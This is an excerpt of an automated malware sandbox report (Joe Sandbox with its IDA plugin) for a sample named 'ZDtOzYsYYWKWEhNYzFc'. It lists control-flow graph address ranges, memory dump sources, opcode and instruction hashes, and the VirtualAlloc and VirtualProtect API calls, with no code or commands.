                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 238 7ffd9b78b0dd-7ffd9b78b0ed 239 7ffd9b78b0ef 238->239 240 7ffd9b78b0f4-7ffd9b78ca87 call 7ffd9b78dc96 238->240 239->240 245 7ffd9b78ca89-7ffd9b78ca97 240->245 246 7ffd9b78caa2-7ffd9b78cb49 245->246 252 7ffd9b78cc56-7ffd9b78ccae 246->252 253 7ffd9b78cb4f-7ffd9b78cb66 246->253 264 7ffd9b78ce45-7ffd9b78cf21 252->264 265 7ffd9b78ccb4-7ffd9b78ccff 252->265 256 7ffd9b78cb68-7ffd9b78cbb3 253->256 257 7ffd9b78cbb4-7ffd9b78cc4d 253->257 256->257 257->252 287 7ffd9b78cc4f 257->287 298 7ffd9b78cf27-7ffd9b78d000 264->298 299 7ffd9b78d002-7ffd9b78d048 264->299 274 7ffd9b78ce2c-7ffd9b78ce39 265->274 276 7ffd9b78ce3f-7ffd9b78ce40 274->276 277 7ffd9b78cd04-7ffd9b78cd12 274->277 281 7ffd9b78d1fd-7ffd9b78d25c 276->281 279 7ffd9b78cd19-7ffd9b78cd99 277->279 280 7ffd9b78cd14 277->280 295 7ffd9b78cd9b 279->295 296 7ffd9b78cda0-7ffd9b78ce1a 279->296 280->279 294 7ffd9b78d524-7ffd9b78d551 281->294 287->252 304 7ffd9b78d557-7ffd9b78d57b call 7ffd9b78dcf9 294->304 305 7ffd9b78d261-7ffd9b78d29d 294->305 295->296 328 7ffd9b78ce1c-7ffd9b78ce21 296->328 329 7ffd9b78ce24-7ffd9b78ce29 296->329 318 7ffd9b78d04f-7ffd9b78d055 298->318 299->318 323 7ffd9b78d57d 304->323 324 7ffd9b78d584-7ffd9b78d5b8 304->324 313 7ffd9b78d2ba-7ffd9b78d521 305->313 314 7ffd9b78d29f-7ffd9b78d2b6 305->314 313->294 314->313 321 7ffd9b78d1ea-7ffd9b78d1f7 318->321 321->281 326 7ffd9b78d05a-7ffd9b78d068 321->326 323->324 336 7ffd9b78d5d8-7ffd9b78d5f5 324->336 337 7ffd9b78d5ba-7ffd9b78d5c7 324->337 330 7ffd9b78d06a 326->330 331 7ffd9b78d06f-7ffd9b78d10f 326->331 328->329 329->274 330->331 369 7ffd9b78d17f-7ffd9b78d1a7 331->369 370 7ffd9b78d111-7ffd9b78d139 331->370 343 7ffd9b78d5fb-7ffd9b78d6f9 336->343 344 7ffd9b78d7b4-7ffd9b78d7b8 336->344 340 7ffd9b78d5c9 337->340 341 7ffd9b78d5ce-7ffd9b78d5d6 337->341 340->341 341->336 343->344 400 7ffd9b78d6ff-7ffd9b78d70b 343->400 347 
7ffd9b78dac7-7ffd9b78db1f 344->347 348 7ffd9b78d7be-7ffd9b78d7c7 344->348 366 7ffd9b78db25-7ffd9b78dbba 347->366 367 7ffd9b78dc87-7ffd9b78dc95 347->367 351 7ffd9b78d7c9-7ffd9b78d7ce 348->351 352 7ffd9b78d7d1-7ffd9b78d7da 348->352 351->352 355 7ffd9b78dab1-7ffd9b78dac1 352->355 355->347 359 7ffd9b78d7df-7ffd9b78d7f0 355->359 360 7ffd9b78d7f7-7ffd9b78d897 359->360 361 7ffd9b78d7f2 359->361 394 7ffd9b78d89d-7ffd9b78d8fd 360->394 395 7ffd9b78daa3-7ffd9b78daab 360->395 361->360 366->367 399 7ffd9b78dbc0-7ffd9b78dbd1 366->399 371 7ffd9b78d1a9 369->371 372 7ffd9b78d1ae-7ffd9b78d1d7 369->372 376 7ffd9b78d13b 370->376 377 7ffd9b78d140-7ffd9b78d17d 370->377 371->372 384 7ffd9b78d1e2-7ffd9b78d1e7 372->384 376->377 377->384 384->321 409 7ffd9b78d8ff 394->409 410 7ffd9b78d904-7ffd9b78d90d 394->410 395->355 402 7ffd9b78dbd8-7ffd9b78dc85 399->402 403 7ffd9b78dbd3 399->403 400->344 404 7ffd9b78d711-7ffd9b78d7a9 400->404 402->367 403->402 404->344 409->410 412 7ffd9b78da7c-7ffd9b78da8a 410->412 413 7ffd9b78d913-7ffd9b78d96b 410->413 417 7ffd9b78da8c 412->417 418 7ffd9b78da91-7ffd9b78da99 412->418 425 7ffd9b78d9f7-7ffd9b78da25 413->425 426 7ffd9b78d971-7ffd9b78d99d 413->426 417->418 419 7ffd9b78da9b-7ffd9b78daa0 418->419 419->395 427 7ffd9b78da27 425->427 428 7ffd9b78da2c-7ffd9b78da7a 425->428 429 7ffd9b78d99f 426->429 430 7ffd9b78d9a4-7ffd9b78d9f2 426->430 427->428 428->419 429->430 430->419
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000014.00000002.1927008128.00007FFD9B78B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B78B000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_20_2_7ffd9b78b000_ZDtOzYsYYWKWEhNYzFc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 159d51c20fb73537085b3acd7a678ab786ba9a651d26329173d9a9e98984f08c
                                                                                                                                • Instruction ID: 3fdef0005d9d4cf974091b70eb0923d366d47bf3f79926a5e3ddbb4710750f6e
                                                                                                                                • Opcode Fuzzy Hash: 159d51c20fb73537085b3acd7a678ab786ba9a651d26329173d9a9e98984f08c
                                                                                                                                • Instruction Fuzzy Hash: 71B2B270A1991D8FDBA4EF58C8A5BA9B7B1FF58301F1042E9D01DD32A6DA356E81CF40

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 581 7ffd9b78c5af-7ffd9b78c5e7 585 7ffd9b78ca47-7ffd9b78ca4d 581->585 586 7ffd9b78c5ec-7ffd9b78c68a 585->586 587 7ffd9b78ca53-7ffd9b78ca87 call 7ffd9b78dc96 585->587 599 7ffd9b78c6ba-7ffd9b78c6c9 586->599 600 7ffd9b78c68c-7ffd9b78c6af 586->600 597 7ffd9b78ca89-7ffd9b78ca97 587->597 601 7ffd9b78caa2-7ffd9b78cb49 597->601 603 7ffd9b78c6cb 599->603 604 7ffd9b78c6d0-7ffd9b78c6df 599->604 600->599 621 7ffd9b78cc56-7ffd9b78ccae 601->621 622 7ffd9b78cb4f-7ffd9b78cb66 601->622 603->604 606 7ffd9b78c6e1-7ffd9b78c6ef 604->606 607 7ffd9b78c6f4-7ffd9b78c70f 604->607 612 7ffd9b78ca26-7ffd9b78ca44 606->612 608 7ffd9b78c72f-7ffd9b78ca1b 607->608 609 7ffd9b78c711-7ffd9b78c72b 607->609 608->612 609->608 612->585 633 7ffd9b78ce45-7ffd9b78cf21 621->633 634 7ffd9b78ccb4-7ffd9b78ccff 621->634 625 7ffd9b78cb68-7ffd9b78cbb3 622->625 626 7ffd9b78cbb4-7ffd9b78cc4d 622->626 625->626 626->621 656 7ffd9b78cc4f 626->656 667 7ffd9b78cf27-7ffd9b78d000 633->667 668 7ffd9b78d002-7ffd9b78d048 633->668 643 7ffd9b78ce2c-7ffd9b78ce39 634->643 645 7ffd9b78ce3f-7ffd9b78ce40 643->645 646 7ffd9b78cd04-7ffd9b78cd12 643->646 650 7ffd9b78d1fd-7ffd9b78d25c 645->650 648 7ffd9b78cd19-7ffd9b78cd99 646->648 649 7ffd9b78cd14 646->649 664 7ffd9b78cd9b 648->664 665 7ffd9b78cda0-7ffd9b78ce1a 648->665 649->648 663 7ffd9b78d524-7ffd9b78d551 650->663 656->621 673 7ffd9b78d557-7ffd9b78d57b call 7ffd9b78dcf9 663->673 674 7ffd9b78d261-7ffd9b78d29d 663->674 664->665 697 7ffd9b78ce1c-7ffd9b78ce21 665->697 698 7ffd9b78ce24-7ffd9b78ce29 665->698 687 7ffd9b78d04f-7ffd9b78d055 667->687 668->687 692 7ffd9b78d57d 673->692 693 7ffd9b78d584-7ffd9b78d5b8 673->693 682 7ffd9b78d2ba-7ffd9b78d521 674->682 683 7ffd9b78d29f-7ffd9b78d2b6 674->683 682->663 683->682 690 7ffd9b78d1ea-7ffd9b78d1f7 687->690 690->650 695 7ffd9b78d05a-7ffd9b78d068 690->695 692->693 705 7ffd9b78d5d8-7ffd9b78d5f5 693->705 
706 7ffd9b78d5ba-7ffd9b78d5c7 693->706 699 7ffd9b78d06a 695->699 700 7ffd9b78d06f-7ffd9b78d10f 695->700 697->698 698->643 699->700 738 7ffd9b78d17f-7ffd9b78d1a7 700->738 739 7ffd9b78d111-7ffd9b78d139 700->739 712 7ffd9b78d5fb-7ffd9b78d6f9 705->712 713 7ffd9b78d7b4-7ffd9b78d7b8 705->713 709 7ffd9b78d5c9 706->709 710 7ffd9b78d5ce-7ffd9b78d5d6 706->710 709->710 710->705 712->713 769 7ffd9b78d6ff-7ffd9b78d70b 712->769 716 7ffd9b78dac7-7ffd9b78db1f 713->716 717 7ffd9b78d7be-7ffd9b78d7c7 713->717 735 7ffd9b78db25-7ffd9b78dbba 716->735 736 7ffd9b78dc87-7ffd9b78dc95 716->736 720 7ffd9b78d7c9-7ffd9b78d7ce 717->720 721 7ffd9b78d7d1-7ffd9b78d7da 717->721 720->721 724 7ffd9b78dab1-7ffd9b78dac1 721->724 724->716 728 7ffd9b78d7df-7ffd9b78d7f0 724->728 729 7ffd9b78d7f7-7ffd9b78d897 728->729 730 7ffd9b78d7f2 728->730 763 7ffd9b78d89d-7ffd9b78d8fd 729->763 764 7ffd9b78daa3-7ffd9b78daab 729->764 730->729 735->736 768 7ffd9b78dbc0-7ffd9b78dbd1 735->768 740 7ffd9b78d1a9 738->740 741 7ffd9b78d1ae-7ffd9b78d1d7 738->741 745 7ffd9b78d13b 739->745 746 7ffd9b78d140-7ffd9b78d17d 739->746 740->741 753 7ffd9b78d1e2-7ffd9b78d1e7 741->753 745->746 746->753 753->690 778 7ffd9b78d8ff 763->778 779 7ffd9b78d904-7ffd9b78d90d 763->779 764->724 771 7ffd9b78dbd8-7ffd9b78dc85 768->771 772 7ffd9b78dbd3 768->772 769->713 773 7ffd9b78d711-7ffd9b78d7a9 769->773 771->736 772->771 773->713 778->779 781 7ffd9b78da7c-7ffd9b78da8a 779->781 782 7ffd9b78d913-7ffd9b78d96b 779->782 786 7ffd9b78da8c 781->786 787 7ffd9b78da91-7ffd9b78da99 781->787 794 7ffd9b78d9f7-7ffd9b78da25 782->794 795 7ffd9b78d971-7ffd9b78d99d 782->795 786->787 788 7ffd9b78da9b-7ffd9b78daa0 787->788 788->764 796 7ffd9b78da27 794->796 797 7ffd9b78da2c-7ffd9b78da7a 794->797 798 7ffd9b78d99f 795->798 799 7ffd9b78d9a4-7ffd9b78d9f2 795->799 796->797 797->788 798->799 799->788
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000014.00000002.1927008128.00007FFD9B78B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B78B000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_20_2_7ffd9b78b000_ZDtOzYsYYWKWEhNYzFc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 548eee18ddbc442b902b9ac3c404e05247acb586ff082642feac4c2175be50ec
                                                                                                                                • Instruction ID: 522573daf230ae2b2fd0a3d5015f4579c0af6f702689c719f5d0ed17ba2d03bd
                                                                                                                                • Opcode Fuzzy Hash: 548eee18ddbc442b902b9ac3c404e05247acb586ff082642feac4c2175be50ec
                                                                                                                                • Instruction Fuzzy Hash: C962D171A19A1D8FDBA8DB58C8A5BA9B7B1FF58301F1042E9D00DD32A5DE356E81CF40

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000014.00000002.1927008128.00007FFD9B78B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B78B000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_20_2_7ffd9b78b000_ZDtOzYsYYWKWEhNYzFc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8e7099fa27a386b45f28b1ed8c03663c151692661ce5e37982b405b3932ce42b
                                                                                                                                • Instruction ID: 48693d4b18ce0526ac5d9d97488c8d4cb52cc6086d1461ce695793b8a03c522b
                                                                                                                                • Opcode Fuzzy Hash: 8e7099fa27a386b45f28b1ed8c03663c151692661ce5e37982b405b3932ce42b
                                                                                                                                • Instruction Fuzzy Hash: 6752CF71A19A1D8FDBA8DF58C8A5BA9B7B1FF58301F1042E9D00DD32A5DA356E81CF40

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000014.00000002.1927008128.00007FFD9B78B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B78B000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_20_2_7ffd9b78b000_ZDtOzYsYYWKWEhNYzFc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f7359aafe8b9e01af71614c79a1d93052d0d2e2bbe284f32ed8675eaf9dbbec5
                                                                                                                                • Instruction ID: bde6bb574bcf290c282cdff5e1129d6d2d3647fe1e59d8ad38c685ee7895af45
                                                                                                                                • Opcode Fuzzy Hash: f7359aafe8b9e01af71614c79a1d93052d0d2e2bbe284f32ed8675eaf9dbbec5
                                                                                                                                • Instruction Fuzzy Hash: 6342C171A1991D8FDBA8DB58C8A5BA9B7B1FB58301F1042E9D00DD32A6DE356E81CF40
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000014.00000002.1927008128.00007FFD9B78B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B78B000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_20_2_7ffd9b78b000_ZDtOzYsYYWKWEhNYzFc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d10ea69be001cb7d20e7e8204546f08279af133b0e6a52beed0d2275e3c96319
                                                                                                                                • Instruction ID: bcdaf43e4e97889855796bfbba1a9653593ddccb242de1c1f8cf89956fbbfbdf
                                                                                                                                • Opcode Fuzzy Hash: d10ea69be001cb7d20e7e8204546f08279af133b0e6a52beed0d2275e3c96319
                                                                                                                                • Instruction Fuzzy Hash: 9D42CF71A19A1D8FDBA8DF58C8A5BA9B7B1FF58301F1042E9D00DD32A5DA356E81CF40
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000014.00000002.1927008128.00007FFD9B78B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B78B000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_20_2_7ffd9b78b000_ZDtOzYsYYWKWEhNYzFc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 18aba7f2e37a4082b2713fba2516adbc37d78db075ee5dc4481488b0d7e7f2f3
                                                                                                                                • Instruction ID: ee2e87a9011a913c12cf888a38a748ea22339f3db944296e9bacf3e6da28f0fc
                                                                                                                                • Opcode Fuzzy Hash: 18aba7f2e37a4082b2713fba2516adbc37d78db075ee5dc4481488b0d7e7f2f3
                                                                                                                                • Instruction Fuzzy Hash: A642C171A19A1D8FDBA8DF58C8A5BA9B7B1FB58301F1042E9D00DD32A5DE356E81CF40
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000014.00000002.1927008128.00007FFD9B78B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B78B000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_20_2_7ffd9b78b000_ZDtOzYsYYWKWEhNYzFc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 7cb8ab9712c660d58501ec69f7273e25f5d2639fbbb7c765cade1eae6db75dd2
                                                                                                                                • Instruction ID: 7480970ea89ad9894b2c992320178d8abdd2525c54aa0b7afc656e8ebba58f92
                                                                                                                                • Opcode Fuzzy Hash: 7cb8ab9712c660d58501ec69f7273e25f5d2639fbbb7c765cade1eae6db75dd2
                                                                                                                                • Instruction Fuzzy Hash: 4C42D271A19A1D8FDBA8DB58C8A5BA9B7B1FF58301F1042E9D00DD32A5DE356E81CF40
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000014.00000002.1927008128.00007FFD9B78B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B78B000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_20_2_7ffd9b78b000_ZDtOzYsYYWKWEhNYzFc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 4a29f3b4641dbc470e1ccc6eb458edc93ab2eec3b290e50481f278aebe619cb4
                                                                                                                                • Instruction ID: 2a4de4cdd3805e878ec8c979ee3224d6effab27a79a92725da87183f575dfe1c
                                                                                                                                • Opcode Fuzzy Hash: 4a29f3b4641dbc470e1ccc6eb458edc93ab2eec3b290e50481f278aebe619cb4
                                                                                                                                • Instruction Fuzzy Hash: 6342C171A19A1D8FDBA8DB58C8A5BA9B7B1FF58301F1042E9D00DD32A5DE356E81CF40
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000014.00000002.1927008128.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_20_2_7ffd9b770000_ZDtOzYsYYWKWEhNYzFc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 98a2a765ce37b75938a4ad1a59626ae131aceebb95ca900ea863946603514512
                                                                                                                                • Instruction ID: 5981fcaabf789c5f1915f271222c321ecfb88b6499b26e81a2173263f88ab8ae
                                                                                                                                • Opcode Fuzzy Hash: 98a2a765ce37b75938a4ad1a59626ae131aceebb95ca900ea863946603514512
                                                                                                                                • Instruction Fuzzy Hash: 35A1A071A18A8D8FE788DF98D8A97ED7BE1FF54304F0042BAE049D36E6CAB814018740

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000014.00000002.1927008128.00007FFD9B77C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B77C000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_20_2_7ffd9b77c000_ZDtOzYsYYWKWEhNYzFc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 544645111-0
                                                                                                                                • Opcode ID: 4e0d404c616cf1f9b3bda597fda336aba952f90ef30de8f1c67258813ea5f11d
                                                                                                                                • Instruction ID: ba501eb7de8b932c4c895968e79aaefc5c11451732a949880185e6059f82983f
                                                                                                                                • Opcode Fuzzy Hash: 4e0d404c616cf1f9b3bda597fda336aba952f90ef30de8f1c67258813ea5f11d
                                                                                                                                • Instruction Fuzzy Hash: 6A519F30D0874D8FDB54DFA8C885AEDBBF0FB66311F1042AAD449E3256DB74A885CB81

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 154 7ffd9b78434d-7ffd9b784483 VirtualAlloc 159 7ffd9b78448b-7ffd9b7844ef 154->159 160 7ffd9b784485 154->160 160->159
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000014.00000002.1927008128.00007FFD9B77C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B77C000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_20_2_7ffd9b77c000_ZDtOzYsYYWKWEhNYzFc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocVirtual
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                • Opcode ID: 33bd41c9a0fa94eb67b77d6a1998b07768b45283d2ce030052e4e082c86eda80
                                                                                                                                • Instruction ID: 17ae631fba34da56ee0271d6d853e5a1d38c5d9f04af168946418d53cf33bee6
                                                                                                                                • Opcode Fuzzy Hash: 33bd41c9a0fa94eb67b77d6a1998b07768b45283d2ce030052e4e082c86eda80
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 742f56c7cd84d7bd9a23f23189715f2ac847372154e9b1ec387524d539e02760
                                                                                                                                • Instruction ID: ca551be671b09bb44bfcc910044b6f884dea62860d91a5bc1d1ff0e9ae3f9837
                                                                                                                                • Opcode Fuzzy Hash: 742f56c7cd84d7bd9a23f23189715f2ac847372154e9b1ec387524d539e02760
                                                                                                                                • Instruction Fuzzy Hash: 62111C30E0561E8FEB64EB54C8947E8B3F0FF54305F4142E5E04DA21A1DE781A85CF84
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000014.00000002.1927008128.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_20_2_7ffd9b770000_ZDtOzYsYYWKWEhNYzFc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 5ae1cbdc57ef04daeed5c47ae9338d361964d1466e15a7463f1f54462e4cab1e
                                                                                                                                • Instruction ID: 5b34e731826611a2c6aa04f271113bbb1654d22664960cc0572ba44a766ff7ad
                                                                                                                                • Opcode Fuzzy Hash: 5ae1cbdc57ef04daeed5c47ae9338d361964d1466e15a7463f1f54462e4cab1e
                                                                                                                                • Instruction Fuzzy Hash: 4DF01970F1971D8ADB68DF5888617E8B6A1FF55300F1101F9E00ED3292CD781AC04B46
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000014.00000002.1927008128.00007FFD9B78B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B78B000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_20_2_7ffd9b78b000_ZDtOzYsYYWKWEhNYzFc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 27230450e8a7e77f2c2cd74ce05a9b3636f0261b2f7c2e8b76a0bad6b9540f09
                                                                                                                                • Instruction ID: e211e0f896a8f9cfc77c83d10a8f6c661b7b87ed6dc1bc55c8366b227217f3dd
                                                                                                                                • Opcode Fuzzy Hash: 27230450e8a7e77f2c2cd74ce05a9b3636f0261b2f7c2e8b76a0bad6b9540f09
                                                                                                                                • Instruction Fuzzy Hash: D7F0B730E2A75DCEEB609AA488583ECB2A0AF19701F110276C41D962B1DB386A81CA00